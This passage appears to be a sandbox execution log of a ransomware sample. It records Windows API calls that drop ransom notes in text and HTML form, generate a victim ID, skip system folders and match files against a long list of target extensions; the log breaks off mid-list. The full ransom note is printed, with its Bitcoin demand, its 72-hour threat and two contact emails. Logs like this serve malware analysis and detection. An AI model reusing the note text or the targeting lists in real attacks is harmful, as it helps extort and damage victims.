	[0177.962] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.962] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.991] CloseHandle (hObject=0x380) returned 1
	[0177.992] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.992] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.992] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0177.993] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.993] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft onedrive\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0177.994] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.994] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.994] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0177.995] CloseHandle (hObject=0x380) returned 1
	[0177.995] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.996] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.996] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.996] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft OneDrive\\HELP_DECRYPT_YOUR_FILES.HTML") returned 66
	[0177.996] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft onedrive\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.000] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.000] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0178.004] CloseHandle (hObject=0x380) returned 1
	[0178.004] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.005] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.005] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.006] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0178.007] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.007] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft onedrive\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.007] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.007] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.007] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0178.008] CloseHandle (hObject=0x380) returned 1
	[0178.008] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\*.*" (normalized: "c:\\users\\all users\\microsoft onedrive\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x83a0a43f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0178.008] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft OneDrive\\*.*") returned 41
	[0178.008] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.008] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft OneDrive\\*.*", cchLength=0x29 | out: lpsz="c:\\users\\all users\\microsoft onedrive\\*.*") returned 0x29
	[0178.008] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.009] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="windows") returned 0x0
	[0178.009] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.009] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="boot") returned 0x0
	[0178.009] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.009] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="system volume information") returned 0x0
	[0178.009] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.009] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.010] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.010] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="temp") returned 0x0
	[0178.010] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.011] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="program files") returned 0x0
	[0178.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.011] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.011] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="appdata") returned 0x0
	[0178.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.011] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="application data") returned 0x0
	[0178.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.012] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="winnt") returned 0x0
	[0178.012] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.012] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="tmp") returned 0x0
	[0178.012] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.012] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="cache") returned 0x0
	[0178.012] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.012] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.012] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.013] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="webcache") returned 0x0
	[0178.013] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.013] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="inetcache") returned 0x0
	[0178.013] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.013] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="nvidia") returned 0x0
	[0178.013] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.013] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="packages") returned 0x0
	[0178.013] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.014] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="cookies") returned 0x0
	[0178.014] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.014] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="programdata") returned 0x0
	[0178.014] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0178.014] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0178.014] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x83a0a43f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.014] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0178.014] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83a0a43f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83a0a43f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83a0a43f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0178.015] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83997bbd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83997bbd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83a0a43f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0178.015] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup", cAlternateFileName="")) returned 1
	[0178.015] lstrcmpW (lpString1="setup", lpString2="..") returned 1
	[0178.015] lstrcmpW (lpString1="setup", lpString2=".") returned 1
	[0178.015] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft OneDrive" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive") returned="C:\\Users\\All Users\\Microsoft OneDrive"
	[0178.015] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft OneDrive", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\") returned="C:\\Users\\All Users\\Microsoft OneDrive\\"
	[0178.015] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\", lpString2="setup" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup") returned="C:\\Users\\All Users\\Microsoft OneDrive\\setup"
	[0178.015] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft OneDrive\\setup" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup") returned="C:\\Users\\All Users\\Microsoft OneDrive\\setup"
	[0178.015] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\") returned="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\"
	[0178.016] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\") returned="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\"
	[0178.016] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*") returned="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*"
	[0178.016] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*" (normalized: "c:\\users\\all users\\microsoft onedrive\\setup\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0xb2476512, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0178.016] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*") returned 47
	[0178.016] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.016] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*", cchLength=0x2f | out: lpsz="c:\\users\\all users\\microsoft onedrive\\setup\\*.*") returned 0x2f
	[0178.016] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="windows") returned 0x0
	[0178.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="boot") returned 0x0
	[0178.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="system volume information") returned 0x0
	[0178.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="temp") returned 0x0
	[0178.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="program files") returned 0x0
	[0178.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="appdata") returned 0x0
	[0178.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="application data") returned 0x0
	[0178.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="winnt") returned 0x0
	[0178.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="tmp") returned 0x0
	[0178.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="cache") returned 0x0
	[0178.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="webcache") returned 0x0
	[0178.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="inetcache") returned 0x0
	[0178.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="nvidia") returned 0x0
	[0178.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="packages") returned 0x0
	[0178.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="cookies") returned 0x0
	[0178.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\*.*", lpSrch="programdata") returned 0x0
	[0178.021] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0xb2476512, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.022] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2476512, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb2476512, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb2476512, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x19, dwReserved0=0x0, dwReserved1=0x0, cFileName="refcount.ini", cAlternateFileName="")) returned 1
	[0178.022] lstrcmpW (lpString1="refcount.ini", lpString2="..") returned 1
	[0178.022] lstrcmpW (lpString1="refcount.ini", lpString2=".") returned 1
	[0178.022] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\") returned="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\"
	[0178.022] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\", lpString2="refcount.ini" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\refcount.ini") returned="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\refcount.ini"
	[0178.022] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\refcount.ini") returned 56
	[0178.022] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.023] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft OneDrive\\setup\\refcount.ini", cchLength=0x38 | out: lpsz="c:\\users\\all users\\microsoft onedrive\\setup\\refcount.ini") returned 0x38
	[0178.023] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.023] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\setup\\refcount.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0178.023] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft onedrive\\setup\\refcount.ini" | out: lpString1="c:\\users\\all users\\microsoft onedrive\\setup\\refcount.ini") returned="c:\\users\\all users\\microsoft onedrive\\setup\\refcount.ini"
	[0178.023] lstrlenW (lpString="c:\\users\\all users\\microsoft onedrive\\setup\\refcount.ini") returned 56
	[0178.023] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.023] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.024] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0178.024] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.024] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.i